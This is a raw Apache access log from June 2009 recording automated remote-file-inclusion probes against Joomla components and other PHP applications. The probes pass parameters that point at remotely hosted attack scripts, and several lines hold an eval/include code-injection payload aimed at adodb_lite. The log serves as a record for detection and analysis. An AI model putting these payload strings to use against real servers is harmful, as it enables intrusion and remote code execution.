200.162.193.82 - - [03/Jun/2009:21:58:18 -0500] "GET /logs/access_log.1241740800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:21:58:20 -0500] "GET /logs/access_log.1241481600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:21:58:20 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:21:58:27 -0500] "GET /logs/access_log.1238803200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
220.181.7.97 - - [03/Jun/2009:22:06:28 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.50.197.106 - - [03/Jun/2009:22:06:56 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:22:06:56 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:22:06:56 -0500] "GET /logs/access_log.1240358400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:22:07:01 -0500] "GET /logs/access_log.1239494400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.162.193.82 - - [03/Jun/2009:22:07:16 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.239 - - [03/Jun/2009:22:07:37 -0500] "GET /logs/access_log.1148774400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.50.197.106 - - [03/Jun/2009:22:07:43 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:22:07:43 -0500] "GET /logs/access_log.1240358400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:22:07:43 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
124.0.73.2 - - [03/Jun/2009:22:07:45 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
124.0.73.2 - - [03/Jun/2009:22:07:46 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
124.0.73.2 - - [03/Jun/2009:22:07:47 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.50.197.106 - - [03/Jun/2009:22:07:49 -0500] "GET /logs/access_log.1239494400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:22:08:09 -0500] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:22:08:09 -0500] "GET /logs/access_log.1239926400/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:22:08:09 -0500] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:22:08:26 -0500] "GET /logs/access_log.1241654400/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
93.187.232.116 - - [03/Jun/2009:22:08:30 -0500] "GET /errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
93.187.232.116 - - [03/Jun/2009:22:08:30 -0500] "GET /logs/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
93.187.232.116 - - [03/Jun/2009:22:08:30 -0500] "GET /logs/access_log.1228521600/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.187.232.116 - - [03/Jun/2009:22:08:30 -0500] "GET /logs/access_log.1228694400/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:09:09 -0500] "GET /errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:09:09 -0500] "GET /logs/access_log.1229126400/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:09:09 -0500] "GET /logs/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:09:09 -0500] "GET /logs/access_log.1225238400/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:09:11 -0500] "GET /logs/access_log.1225238400/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:09:11 -0500] "GET /errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:09:11 -0500] "GET /logs/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:09:11 -0500] "GET /logs/access_log.1229126400/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.187.232.116 - - [03/Jun/2009:22:09:53 -0500] "GET /logs/access_log.1228521600/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.146 - - [03/Jun/2009:22:10:07 -0500] "GET /logs/access_log.1223856000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.125.245.26 - - [03/Jun/2009:22:10:31 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:22:10:31 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
75.125.245.26 - - [03/Jun/2009:22:10:31 -0500] "GET /logs/access_log.1238544000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:10:57 -0500] "GET /logs/access_log.1228608000%20%20/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
38.99.44.102 - - [03/Jun/2009:22:11:21 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.52.2.130 - - [03/Jun/2009:22:11:21 -0500] "GET /logs/access_log.1228608000%20%20/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:22:11:42 -0500] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:22:11:42 -0500] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:22:11:42 -0500] "GET /logs/access_log.1242000000/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
93.187.232.116 - - [03/Jun/2009:22:11:55 -0500] "GET /logs/access_log.1228608000%20%20/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
110.45.144.106 - - [03/Jun/2009:22:12:02 -0500] "GET /logs/access_log.1240358400/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 368 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:22:12:58 -0500] "GET /errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:22:12:58 -0500] "GET /logs/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:22:12:58 -0500] "GET /logs/access_log.1227398400/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:22:12:59 -0500] "GET /logs/access_log.1227916800/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:14:36 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:14:36 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:14:36 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:14:36 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:14:37 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:14:37 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:15:19 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:15:19 -0500] "GET //?_zb_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:15:20 -0500] "GET /logs//?_zb_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 191989 "-""Mozilla/5.0"
89.223.3.98 - - [03/Jun/2009:22:15:26 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.223.3.98 - - [03/Jun/2009:22:15:26 -0500] "GET /logs/access_log.1240444800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
89.223.3.98 - - [03/Jun/2009:22:15:26 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
89.223.3.98 - - [03/Jun/2009:22:15:26 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
190.144.44.36 - - [03/Jun/2009:22:15:52 -0500] "GET /errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:22:15:52 -0500] "GET /logs/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
74.52.2.130 - - [03/Jun/2009:22:16:02 -0500] "GET /logs/access_log.1228608000/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.223.3.98 - - [03/Jun/2009:22:17:07 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.223.3.98 - - [03/Jun/2009:22:17:07 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
89.223.3.98 - - [03/Jun/2009:22:17:07 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
89.223.3.98 - - [03/Jun/2009:22:17:08 -0500] "GET /logs/access_log.1240444800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:19:18 -0500] "GET /logs/access_log.1225843200/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:19:34 -0500] "GET /logs/access_log.1225843200/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:21:27 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 335 "-""Mozilla/4.61 (Macintosh; I; PPC)"
74.52.2.130 - - [03/Jun/2009:22:21:27 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 362 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.92.135.138 - - [03/Jun/2009:22:21:28 -0500] "GET /logs/access_log.1228608000%20%20/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:21:31 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 340 "-""Mozilla/4.61 (Macintosh; I; PPC)"
216.15.161.2 - - [03/Jun/2009:22:21:37 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:22:00 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:22:08 -0500] "GET /logs/access_log.1240272000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 362 "-""Mozilla/4.61 (Macintosh; I; PPC)"
89.188.129.126 - - [03/Jun/2009:22:22:16 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:22:16 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:22:16 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:23:45 -0500] "GET /logs/access_log.1228608000/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:24:15 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [03/Jun/2009:22:24:43 -0500] "GET /environment.php?DIR_PREFIX=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
201.232.54.48 - - [03/Jun/2009:22:24:43 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
201.232.54.48 - - [03/Jun/2009:22:24:43 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
190.144.44.36 - - [03/Jun/2009:22:27:01 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:22:27:01 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
201.232.54.48 - - [03/Jun/2009:22:27:23 -0500] "GET /logs/access_log.1233878400/environment.php?DIR_PREFIX=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:22:28:29 -0500] "GET /logs/access_log.1228608000/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:29:08 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 348 "-""Mozilla/4.61 (Macintosh; I; PPC)"
74.52.2.130 - - [03/Jun/2009:22:29:08 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 343 "-""Mozilla/4.61 (Macintosh; I; PPC)"
74.52.2.130 - - [03/Jun/2009:22:29:08 -0500] "GET /logs/access_log.1237248000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 370 "-""Mozilla/4.61 (Macintosh; I; PPC)"
89.188.129.126 - - [03/Jun/2009:22:29:29 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:29:29 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:29:29 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:22:30:17 -0500] "GET /logs/access_log.1229126400/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.92.135.138 - - [03/Jun/2009:22:30:17 -0500] "GET /logs/access_log.1225843200/errors.php?error=http://storebiz4u.com/components/uiu.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:31:08 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:31:08 -0500] "GET /logs/access_log.1238112000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:31:08 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:31:12 -0500] "GET /logs/access_log.1240272000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 370 "-""Mozilla/4.61 (Macintosh; I; PPC)"
74.52.2.130 - - [03/Jun/2009:22:32:26 -0500] "GET /logs/access_log.1237507200//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 370 "-""Mozilla/4.61 (Macintosh; I; PPC)"
89.188.129.126 - - [03/Jun/2009:22:32:31 -0500] "GET /logs/access_log.1239062400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
190.144.44.36 - - [03/Jun/2009:22:33:19 -0500] "GET /?sourcedir=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
190.144.44.36 - - [03/Jun/2009:22:33:25 -0500] "GET /logs/?sourcedir=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 200 191984 "-""libwww-perl/5.79"
89.188.129.126 - - [03/Jun/2009:22:34:01 -0500] "GET //?path%5Bdocroot%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:34:01 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.188.129.126 - - [03/Jun/2009:22:34:02 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 191989 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:34:14 -0500] "GET /logs/access_log.1236470400//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 370 "-""Mozilla/4.61 (Macintosh; I; PPC)"
89.188.129.126 - - [03/Jun/2009:22:34:30 -0500] "GET /logs/access_log.1241740800//?path%5Bdocroot%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
74.52.2.130 - - [03/Jun/2009:22:35:13 -0500] "GET /logs/access_log.1240099200//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.evlenirmisin.de/gefel.txt? HTTP/1.1" 404 370 "-""Mozilla/4.61 (Macintosh; I; PPC)"
216.15.161.2 - - [03/Jun/2009:22:36:52 -0500] "GET /logs/access_log.1241481600//skin/zero_vote/ask_password.php?dir=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:36:52 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:36:52 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:36:56 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:36:56 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.15.161.2 - - [03/Jun/2009:22:36:56 -0500] "GET /logs/access_log.1241481600//skin/zero_vote/ask_password.php?dir=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:38:52 -0500] "GET //skin/zero_vote/error.php?dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:38:52 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:38:52 -0500] "GET /logs/access_log.1230422400//skin/zero_vote/error.php?dir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
78.111.80.18 - - [03/Jun/2009:22:39:02 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
